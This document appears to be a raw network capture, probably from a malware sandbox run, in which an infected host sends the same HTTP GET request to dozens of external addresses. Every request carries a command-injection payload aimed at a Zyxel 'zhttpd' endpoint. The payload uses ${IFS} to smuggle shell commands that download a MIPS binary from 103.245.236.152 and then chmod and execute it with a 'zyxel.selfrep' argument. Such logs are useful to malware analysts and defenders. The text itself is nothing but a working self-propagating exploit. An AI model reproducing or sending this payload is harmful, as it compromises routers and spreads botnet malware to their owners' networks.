                                      Jan 14, 2024 15:50:45.283571959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4159192.168.2.1455696123.50.236.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.283632994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4160192.168.2.144735235.243.167.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.283706903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4161192.168.2.143312069.48.233.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.283768892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4162192.168.2.144586280.166.143.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.283821106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4163192.168.2.1456176122.201.65.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.283869982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4164192.168.2.1434680218.12.182.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.283936024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4165192.168.2.1450144142.202.137.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.284003019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4166192.168.2.1452426168.205.170.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.284056902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4167192.168.2.144038643.67.100.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.284121037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4168192.168.2.144772492.238.231.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.284152031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4169192.168.2.143652892.195.159.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.284210920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4170192.168.2.14411142.9.50.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.284271002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4171192.168.2.1434436106.173.25.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.284322977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4172192.168.2.1455826136.239.223.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.284408092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4173192.168.2.144528493.106.38.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.284465075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4174192.168.2.1453884182.188.142.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.284528017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4175192.168.2.143405871.30.113.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.284589052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4176192.168.2.1439020116.181.35.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.284621954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4177192.168.2.1437714171.6.230.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.284681082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4178192.168.2.143366483.85.126.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.284748077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4179192.168.2.145453263.21.59.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.284818888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4180192.168.2.1444980208.131.114.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.284872055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4181192.168.2.1433624178.121.37.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.284938097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4182192.168.2.1437722170.136.99.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.284991026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4183192.168.2.1450538135.47.39.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.285054922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4184192.168.2.1458708160.49.117.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.289941072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4185192.168.2.1447040136.146.133.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.290025949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4186192.168.2.1451814160.172.43.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.290096045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4187192.168.2.145097636.21.86.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.290142059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4188192.168.2.1437824220.223.179.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.290193081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4189192.168.2.145462069.247.95.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.290241957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4190192.168.2.145273669.93.133.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.290272951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4191192.168.2.144274019.200.212.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.290309906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4192192.168.2.143824661.242.103.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.290381908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4193192.168.2.1454996166.63.138.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.293384075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4194192.168.2.143789664.110.74.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.293486118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4195192.168.2.1440966173.198.40.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.293606997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4196192.168.2.1458324210.49.128.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.293653011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4197192.168.2.1438744194.21.136.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.293724060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4198192.168.2.143691664.169.106.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.293766022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4199192.168.2.1452518135.96.224.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.293809891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4200192.168.2.1459622186.185.127.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.293884993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4201192.168.2.1445646149.233.195.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.293927908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4202192.168.2.144684496.98.186.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.293987989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4203192.168.2.145014671.81.111.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.294053078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4204192.168.2.1451014189.79.65.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.294107914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4205192.168.2.145956465.25.42.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.294161081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4206192.168.2.143309468.240.122.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.294229984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4207192.168.2.1434138107.23.64.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.294254065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4208192.168.2.1455884154.67.115.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.294306040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4209192.168.2.1443438114.219.133.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.294367075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4210192.168.2.1459220210.221.179.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.294425011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4211192.168.2.1447088151.68.242.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.294455051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4212192.168.2.1452742125.56.145.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.294517994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4213192.168.2.1438410142.146.66.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.294584036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4214192.168.2.1445532164.204.56.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.294645071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4215192.168.2.1453498213.21.46.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.294682026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4216192.168.2.143437835.25.22.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.294735909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4217192.168.2.144668639.1.251.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.294800043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4218192.168.2.145019612.123.162.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.294846058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4219192.168.2.1441190160.43.206.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.294889927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4220192.168.2.1439048136.147.121.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.294958115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4221192.168.2.143306218.197.166.205443
                                      TimestampBytes transferredDirectionData
